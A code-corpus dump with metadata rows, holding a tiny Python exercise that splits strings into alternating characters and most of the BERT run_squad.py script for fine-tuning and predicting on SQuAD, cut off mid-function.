numFlower = len(self.flowerlist)
txt = 'Flower Collection (%s flowers):' % numFlower
for flower in self.flowerlist:
txt += '\n' + str(flower)
return txt
| [
"[email protected]"
] | |
cc462bc85d0d716ae2e44775a9e09ff96c2e6614 | d9f52125601ec26f79202f0e912891b31b60ffc4 | /오전반/30-days-of-code/Day_06/Day_06_YNY.py | 463f620727b012c7231ca35c7a30dd8078ae48fe | [] | no_license | YoungGaLee/2020_Python_coding-study | 5a4f36a39021c89ac773a3a7878c44bf8b0b811f | b876aabc747709afa21035c3afa7e3f7ee01b26a | refs/heads/master | 2022-12-12T13:34:44.729245 | 2020-09-07T04:07:48 | 2020-09-07T04:07:48 | 280,745,587 | 4 | 4 | null | 2020-07-22T03:27:22 | 2020-07-18T21:51:40 | Python | UTF-8 | Python | false | false | 268 | py | n=int(input())
q_odd=[]
q_even=[]
for i in range (n):
q=str(input())
for j in range(len(q)):
if j%2==0:
q_odd.append(q[j])
if j%2==1:
q_even.append(q[j])
print("".join(q_odd) ,"".join(q_even))
q_odd,q_even=[],[]
| [
"[email protected]"
] | |
2aacf7a42a5e5ba680eac760fa60e5e5c13abc8f | 3d69b7fe8fa95fcd6dbab25885f2e3e42bc891d6 | /src/nlp/classification/tf1/bert/run_squad.py | 37118c6db8065cbadf118ecc3b0a13473347453d | [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] | permissive | wu-uw/OpenCompetition | ac652d066f667dc2b3061947af5ea0425643a1b5 | 9aa9d7a50ada1deb653d295dd8a7fe46321b9094 | refs/heads/master | 2021-01-03T04:59:28.987099 | 2020-03-02T07:49:11 | 2020-03-02T07:49:11 | 239,932,371 | 0 | 0 | Apache-2.0 | 2020-03-02T07:49:12 | 2020-02-12T05:12:02 | Python | UTF-8 | Python | false | false | 51,567 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os
import random
import modeling
import optimization
import tokenization
import six
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
# Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
# Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
flags.DEFINE_string(
"predict_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float(
"learning_rate",
5e-5,
"The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
"If null_score - best_non_null is greater than the threshold predict null.")
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.start_position:
s += ", end_position: %d" % (self.end_position)
if self.start_position:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset +
answer_length - 1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(
doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning(
"Could not find answer: '%s' vs. '%s'",
actual_text,
cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(
tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(
doc_spans, doc_span_index, split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
if example_index < 20:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (unique_id))
tf.logging.info("example_index: %s" % (example_index))
tf.logging.info("doc_span_index: %s" % (doc_span_index))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.logging.info("input_ids: %s" %
" ".join([str(x) for x in input_ids]))
tf.logging.info(
"input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info("segment_ids: %s" %
" ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(
tokens[start_position:(end_position + 1)])
tf.logging.info("start_position: %d" % (start_position))
tf.logging.info("end_position: %d" % (end_position))
tf.logging.info("answer: %s" %
(tokenization.printable_text(answer_text)))
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + \
0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(
" name = %s, shape = %s" %
(name, features[name].shape))
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(
init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
else:
raise ValueError(
"Only TRAIN and PREDICT modes are supported: %s" % (mode))
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"unique_ids": tf.FixedLenFeature([], tf.int64),
"input_ids": tf.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
return d
return input_fn
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file):
"""Write final predictions to the json file and log-odds of null if needed."""
tf.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.logging.info("Writing nbest to: %s" % (output_nbest_file))
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min mull score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of
# irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + \
result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(
start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(
pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(
orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
# if we didn't inlude the empty option in the n-best, inlcude it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
probs = _compute_softmax(total_scores)
nbest_json = []
for (i, entry) in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null >
# threshold
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
with tf.gfile.GFile(output_prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with tf.gfile.GFile(output_nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if FLAGS.version_2_with_negative:
with tf.gfile.GFile(output_null_log_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
# Therefore, we have to apply a semi-complicated alignment heruistic between
# `pred_text` and `orig_text` to get a character-to-charcter alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.logging.info(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.logging.info(
"Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text,
tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(
enumerate(logits),
key=lambda x: x[1],
reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, filename, is_training):
self.filename = filename
self.is_training = is_training
self.num_features = 0
self._writer = tf.python_io.TFRecordWriter(filename)
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
self.num_features += 1
def create_int_feature(values):
feature = tf.train.Feature(
int64_list=tf.train.Int64List(value=list(values)))
return feature
features = collections.OrderedDict()
